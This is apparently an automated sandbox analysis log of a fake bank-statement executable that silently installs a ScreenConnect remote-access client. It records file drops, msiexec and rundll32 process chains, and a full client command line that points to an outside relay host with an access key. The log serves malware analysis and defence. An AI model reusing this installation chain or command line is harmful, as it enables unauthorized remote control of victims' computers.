                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{2AB23E87-2E48-F825-88EA-423B8FFA6658}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5684.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56A4.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI586B.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6153c7.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6153c7.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{2AB23E87-2E48-F825-88EA-423B8FFA6658}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{2AB23E87-2E48-F825-88EA-423B8FFA6658}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{2AB23E87-2E48-F825-88EA-423B8FFA6658}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d519fd2fdcfe66e7)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d519fd2fdcfe66e7)\cq3gckld.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d519fd2fdcfe66e7)\cq3gckld.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI56A4.tmpJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeCode function: 0_2_0568CCF00_2_0568CCF0
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeCode function: 0_2_05684CA00_2_05684CA0
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeCode function: 0_2_0568DEC30_2_0568DEC3
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeCode function: 0_2_0568E9410_2_0568E941
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeCode function: 0_2_05687B480_2_05687B48
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeCode function: 0_2_05684C900_2_05684C90
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeCode function: 7_2_016CCE2F7_2_016CCE2F
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B34D5FA8_2_00007FFD9B34D5FA
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6412E38_2_00007FFD9B6412E3
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B64158C8_2_00007FFD9B64158C
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B64246D8_2_00007FFD9B64246D
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B336FF29_2_00007FFD9B336FF2
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B33D5FA9_2_00007FFD9B33D5FA
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B35FE089_2_00007FFD9B35FE08
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B63AAF29_2_00007FFD9B63AAF2
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B6329859_2_00007FFD9B632985
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B639D469_2_00007FFD9B639D46
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1715462990.00000000016B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1729022620.0000000005A02000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1729022620.0000000005A02000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1729022620.0000000005A02000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1729022620.0000000005A02000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1723679267.0000000005580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000009A8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000009A8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000009A8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000009A8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000009A8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1730905665.0000000006302000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1730905665.0000000006302000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1730905665.0000000006302000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000000.1703130673.00000000005C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exe, 00000000.00000002.1725970611.0000000005630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenamezlib.dll2 vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenamewixca.dll\ vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs 2024-11 eStmt 5563019.exe
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.2.2024-11 eStmt 5563019.exe.5580000.1.raw.unpack, BlockBufferStream.csCryptographic APIs: 'TransformBlock'
                              Source: 0.0.2024-11 eStmt 5563019.exe.5c63d8.4.raw.unpack, BlockBufferStream.csCryptographic APIs: 'TransformBlock'
                              Source: 0.0.2024-11 eStmt 5563019.exe.647fd8.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.2024-11 eStmt 5563019.exe.5c63d8.4.raw.unpack, FileSystemExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.0.2024-11 eStmt 5563019.exe.5c63d8.4.raw.unpack, FileSystemExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 0.0.2024-11 eStmt 5563019.exe.647fd8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.2024-11 eStmt 5563019.exe.5580000.1.raw.unpack, FileSystemExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.2024-11 eStmt 5563019.exe.5580000.1.raw.unpack, FileSystemExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal46.evad.winEXE@17/53@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)Jump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2024-11 eStmt 5563019.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: 2024-11 eStmt 5563019.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 2024-11 eStmt 5563019.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4E28.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6377093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: 2024-11 eStmt 5563019.exeReversingLabs: Detection: 25%
                              Source: 2024-11 eStmt 5563019.exeVirustotal: Detection: 26%
                              Source: 2024-11 eStmt 5563019.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: 2024-11 eStmt 5563019.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeFile read: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\2024-11 eStmt 5563019.exe "C:\Users\user\Desktop\2024-11 eStmt 5563019.exe"
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\d519fd2fdcfe66e7\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4AED0F1D3607922BE2F1EC6832F9BAE3 C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4E28.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6377093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A5BF5D09ED87785AFA67BD755C799625
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 68F89B22406E06E7C28E4AD1705B01FD E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bw36back93.site&p=8880&s=e250a80a-96da-47fd-91f2-1c092bc9b1b7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVrCWSt%2b2cKthNAS8WCpzwBkW7gylKQJ6RDxIjHv%2fRvikga3OHVBUUk74eX5u2WDvyGlxXUsTAHstE3Rks8Zw%2f5nMdMDz%2ffz%2fdADWqNvA27WRDTbgEuKYVImg%2bRuQTeYBssAlSkC71PJ4gqNaRdbnySWnXqNuCohB8XKd6MUQapUfc4DXF0e7EWF1onYtP%2bZz6ui1%2fvm3P0miTphdoOYDPJyJmnFL6AS3%2bEi4fXJkHoPDDjsiShDMOBGrn%2bwsLLVTQZCpIQElO7sxadYkptz0t1JF7bRKqG2Z6vshgz%2fal71%2fFvdI1kgsL2h5jLyMZgmq6EW%2fOzhQCdP4oY8SDbMW0&c=SV&c=11-11%20NEWP&c=&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "be299499-1fb7-4c2b-ae20-2cc88daa91a5" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "8321ee3f-595b-4e66-bca9-df29533298fb" "System"
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\d519fd2fdcfe66e7\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4AED0F1D3607922BE2F1EC6832F9BAE3 CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A5BF5D09ED87785AFA67BD755C799625Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 68F89B22406E06E7C28E4AD1705B01FD E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4E28.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6377093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "be299499-1fb7-4c2b-ae20-2cc88daa91a5" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "8321ee3f-595b-4e66-bca9-df29533298fb" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\2024-11 eStmt 5563019.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
